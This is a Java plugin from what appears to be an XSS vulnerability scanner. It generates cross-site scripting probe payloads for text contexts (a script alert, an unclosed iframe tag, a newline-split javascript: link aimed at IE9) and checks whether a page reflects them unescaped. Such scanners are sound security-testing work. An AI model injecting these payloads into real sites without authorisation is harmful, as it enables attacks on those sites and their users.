package com.vulnit.projects.xss.plugins;

import org.jsoup.nodes.Document;
import org.jsoup.nodes.Element;
import org.jsoup.select.Elements;

/**
 * Plugin to handle basic text (without RCDATA)
 * 
 * @author rmillet
 * 
 */
public final class TextPlugin extends Plugin {
	private int currentPayload = 0;
	private String scriptText;

	@Override
	public String getInitialPayload(Elements elements, String searchText) {
		for (Element element : elements) {
			String tagName = element.tagName();
			if ((!tagName.equals("textarea") && !tagName.equals("title"))
					&& element.ownText().contains(searchText)) {
				this.currentPayload = 0;
				this.scriptText = "alert(" + Plugin.NumTag + ")";
				return "<script>" + this.scriptText + "</script>";
			}
		}
		return null;
	}

	@Override
	public String getPayload() {
		++this.currentPayload;

		if (this.currentPayload == 1) {
			// Unclosed tag
			this.scriptText = "http://" + Plugin.Tag;
			return "<iframe src=" + this.scriptText + " ";
		} else if (this.currentPayload == 2) {
			// Truncated payload (works on IE9)
			this.scriptText = "javas\ncript:alert(" + Plugin.NumTag + ")";
			return "<a href=\"" + this.scriptText + "\">a</a>";
		}

		return null;
	}

	@Override
	public boolean isInjectionSuccessful(Document document) {
		if (this.currentPayload == 0) {
			Elements elements = document.select("script");
			for (Element element : elements) {
				if (element.data().contains(scriptText)) {
					return true;
				}
			}
		} else if (this.currentPayload == 1) {
			Elements elements = document.select("iframe[src]");
			for (Element element : elements) {
				if (element.attr("src").equals(this.scriptText)) {
					return true;
				}
			}
		} else if (this.currentPayload == 2) {
			Elements elements = document.select("a[href]");
			for (Element element : elements) {
				if (element.attr("href").equals(this.scriptText)) {
					return true;
				}
			}
		}
		return false;
	}

}
